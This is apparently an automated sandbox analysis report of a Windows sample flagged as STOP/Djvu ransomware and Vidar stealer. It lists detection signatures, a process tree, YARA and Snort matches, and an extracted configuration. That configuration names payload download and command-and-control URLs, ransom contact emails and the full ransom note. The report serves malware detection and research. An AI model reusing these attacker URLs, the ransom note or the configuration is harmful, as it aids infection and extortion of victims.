Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe

Overview

General Information

Sample name:9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
Analysis ID:1373508
MD5:3eeb7b2030517f91fdf0f4c5278d8e76
SHA1:c4c3a4650d278f2f8b9bf871c2ae91508ffae165
SHA256:4ad7b8d228fe32d82b0373ce886f224f47c2e06a59d394c634160c70083b5f32
Tags:exe
Infos:

Detection

Babuk, Djvu, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found stalling execution ending in API Sleep call
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe (PID: 7496 cmdline: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe MD5: 3EEB7B2030517F91FDF0F4C5278D8E76)
    • icacls.exe (PID: 7576 cmdline: icacls "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
    • 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe (PID: 7608 cmdline: "C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --Admin IsNotAutoStart IsNotTask MD5: 3EEB7B2030517F91FDF0F4C5278D8E76)
      • build2.exe (PID: 7756 cmdline: "C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe" MD5: C4070DA9F9B0581171AF16E681CCDFF8)
        • build2.exe (PID: 7772 cmdline: "C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe" MD5: C4070DA9F9B0581171AF16E681CCDFF8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Djvu

{"Download URLs": ["http://brusuax.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-99MNqXMrdS\r\nPrice of private key and decrypt software is $1999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $999.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0840ASdw", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\\/sWjMd\\\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7vAvQJa0bzVOF1YKNM9ycEaFo3i1IYPt\\\\nxz\\/jq68R20b+hkZtNTv54hcU7\\/Ez+0pdyzteV5Zhg7wXU130hV2tpLc73CPJWPbH\\\\n1Cb\\/TPj2BV1MyBjdQNygBMKZXr5AiecEZscmy3tPXp6G+PWkUj06eqE1m7OGGguB\\\\n99Z7DX1\\/1zY5jmMj5lpDmJWwWf7WaMni1yYPeNWGd67CNvvOmb+YjuTg4HXMAgQ2\\\\nWnCip4mCf70IqmZ2U\\/J0OUQFuCkNaQb0Q0aLFcT4bMDszWR\\/xOhuh2YWJQ0LO+gm\\\\nJQIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeMALWARE_Win_STOPDetects STOP ransomwareditekSHen
    • 0xfe888:$x1: C:\SystemID\PersonalID.txt
    • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
    • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
    • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
    • 0xfecec:$s1: " --AutoStart
    • 0xfed00:$s1: " --AutoStart
    • 0x102948:$s2: --ForNetRes
    • 0x102910:$s3: --Admin
    • 0x102d90:$s4: %username%
    • 0x102eb4:$s5: ?pid=
    • 0x102ec0:$s6: &first=true
    • 0x102ed8:$s6: &first=false
    • 0xfedf4:$s7: delself.bat
    • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
    • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
    • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\tmp3BC7.tmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      C:\Users\user\AppData\Local\Temp\tmp3BC7.tmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
      • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
      C:\Users\user\AppData\Local\Temp\tmp3BC7.tmpMALWARE_Win_STOPDetects STOP ransomwareditekSHen
      • 0xfe888:$x1: C:\SystemID\PersonalID.txt
      • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
      • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
      • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
      • 0xfecec:$s1: " --AutoStart
      • 0xfed00:$s1: " --AutoStart
      • 0x102948:$s2: --ForNetRes
      • 0x102910:$s3: --Admin
      • 0x102d90:$s4: %username%
      • 0x102eb4:$s5: ?pid=
      • 0x102ec0:$s6: &first=true
      • 0x102ed8:$s6: &first=false
      • 0xfedf4:$s7: delself.bat
      • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
      • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
      • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
      C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000003.1662696538.0000000003391000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          00000000.00000003.1662696538.0000000003391000.00000004.00000020.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x3570:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          00000002.00000000.1666073748.00000000002E1000.00000020.00000001.01000000.00000007.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          00000003.00000000.1667079139.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
            Click to see the 44 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
              10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
              • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
              • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
              10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
              • 0xfe888:$x1: C:\SystemID\PersonalID.txt
              • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
              • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
              • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
              • 0xfecec:$s1: " --AutoStart
              • 0xfed00:$s1: " --AutoStart
              • 0x102948:$s2: --ForNetRes
              • 0x102910:$s3: --Admin
              • 0x102d90:$s4: %username%
              • 0x102eb4:$s5: ?pid=
              • 0x102ec0:$s6: &first=true
              • 0x102ed8:$s6: &first=false
              • 0xfedf4:$s7: delself.bat
              • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
              • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
              • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              2.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
                2.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
                • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
                • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
                Click to see the 25 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.4175.120.254.949732802833438 01/12/24-06:48:00.971760
                SID:2833438
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4175.120.254.949740802833438 01/12/24-06:48:06.593430
                SID:2833438
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4175.120.254.949746802833438 01/12/24-06:48:12.962877
                SID:2833438
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4186.147.159.14949734802020826 01/12/24-06:48:01.179520
                SID:2020826
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4186.147.159.14949734802036333 01/12/24-06:48:01.179520
                SID:2036333
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4175.120.254.949735802020826 01/12/24-06:48:04.269814
                SID:2020826
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4175.120.254.949735802036333 01/12/24-06:48:04.269814
                SID:2036333
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://zexeq.com/files/1/build3.exe$runURL Reputation: Label: malware
                Source: http://zexeq.com/files/1/build3.exedAvira URL Cloud: Label: malware
                Source: http://zexeq.com/test1/get.phpAvira URL Cloud: Label: malware
                Source: http://zexeq.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637;9Avira URL Cloud: Label: malware
                Source: http://brusuax.com/dl/build2.exeAvira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exe$runeAvira URL Cloud: Label: malware
                Source: http://zexeq.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueAvira URL Cloud: Label: malware
                Source: http://brusuax.com/dl/build2.exe$runAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 10.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpackMalware Configuration Extractor: Djvu {"Download URLs": ["http://brusuax.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-99MNqXMrdS\r\nPrice of private key and decrypt software is $1999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $999.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0840ASdw", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\
                Multi AV Scanner detection for domain / URL
                Source: zexeq.comVirustotal: Detection: 20%Perma Link
                Source: brusuax.comVirustotal: Detection: 18%Perma Link
                Source: http://zexeq.com/test1/get.phpVirustotal: Detection: 19%Perma Link
                Source: http://zexeq.com/files/1/build3.exedVirustotal: Detection: 16%Perma Link
                Source: http://brusuax.com/dl/build2.exeVirustotal: Detection: 25%Perma Link
                Source: http://zexeq.com/files/1/build3.exe$runeVirustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeReversingLabs: Detection: 79%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exeReversingLabs: Detection: 79%
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeReversingLabs: Detection: 86%
                Multi AV Scanner detection for submitted file
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeReversingLabs: Detection: 86%
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeVirustotal: Detection: 78%Perma Link
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA1178 CryptDestroyHash,CryptReleaseContext,0_2_00BA1178
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_00B9E870
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_00B9EAA0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9EA51 CryptDestroyHash,CryptReleaseContext,0_2_00B9EA51
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9EC68 CryptDestroyHash,CryptReleaseContext,0_2_00B9EC68
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA0FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,0_2_00BA0FC0
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EE870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_002EE870
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EEAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_002EEAA0
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002F0FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_002F0FC0
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002F1178 CryptDestroyHash,CryptReleaseContext,2_2_002F1178
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EEA51 CryptDestroyHash,CryptReleaseContext,2_2_002EEA51
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EEC68 CryptDestroyHash,CryptReleaseContext,2_2_002EEC68
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_00B9E870
